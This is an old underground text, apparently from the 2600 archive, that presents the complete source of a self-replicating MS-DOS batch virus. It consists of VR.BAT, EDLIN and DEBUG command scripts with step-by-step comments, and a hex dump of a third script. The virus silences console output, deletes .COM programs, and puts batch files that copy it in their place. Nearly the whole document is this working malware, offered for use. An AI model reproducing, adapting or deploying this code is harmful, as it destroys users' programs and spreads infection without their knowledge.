A Batch Virus

by Frosty of the GCMS

Whoever thought that viruses could be in batch files?

This virus which we are about to see makes use of the MS-DOS operating system.  This batch virus uses DEBUG and EDLIN programs.

VR.BAT

Contents:

ECHO = OFF          ; Self explanatory
CTTY NUL            ; This is important. Console output is turned off
PATH C:\MSDOS       ; May differ on other systems
DIR /W *.COM > IND  ; The directory is written on 'IND' ONLY name entries
EDLIN IND < 1       ; 'IND' is processed with EDLIN so only file names appear
DEBUG IND < 2       ; New batch program is created with DEBUG
EDLIN NAME.BAT < 3  ; This batch goes to an executable form because of EDLIN
CTTY CON            ; Console interface is again assigned
NAME.BAT            ; Newly created NAME.BAT is called

In addition to this batch file, there are command files, here named 1, 2, and 3.

Here is the first command file:

1

1,4D  ; Here line 1-4 of the IND file are deleted)
E     ; Save file

Here is the second command file (DEBUG commands):

2

M100,10B,F000    ; First program name is moved to the F000H address to save
E108 ".BAT"      ; Extension of file name is changed to .BAT
M100,10B,F010    ; File is saved again
E100 "DEL "      ; DEL command is written to address 100H
MF000,F00B,104   ; Original file is written after this command
E10C 2E          ; Period is placed in front of extension)
E110 0D,0A       ; Carriage return plus line feed
MF010,F020,11F   ; Modified file is moved to 11FH address from buffer area
E112 "COPY \VR.BAT" ; COPY command is now placed in front of file
E12B 0D,0A       ; COPY command terminated with carriage return plus line feed)
RXC              ; The CX register is ...
2C               ; Set to 2CH
N NAME.BAT       ; Name it NAME.BAT
W                ; Write
Q                ; Quit

The third command file must be printed as a hex dump because it contains two control characters (1A = Control-Z) and this is not entirely printable.

Hex dump of the third command file:

3

0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
0110 79 29 0D 32 2C 32 3F 52-20 1A 0D 6E 6E 79 79 79
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00

In order for this virus to work, VR.BAT should be in the root.  This program only affects COM files.

Return to $2600 Index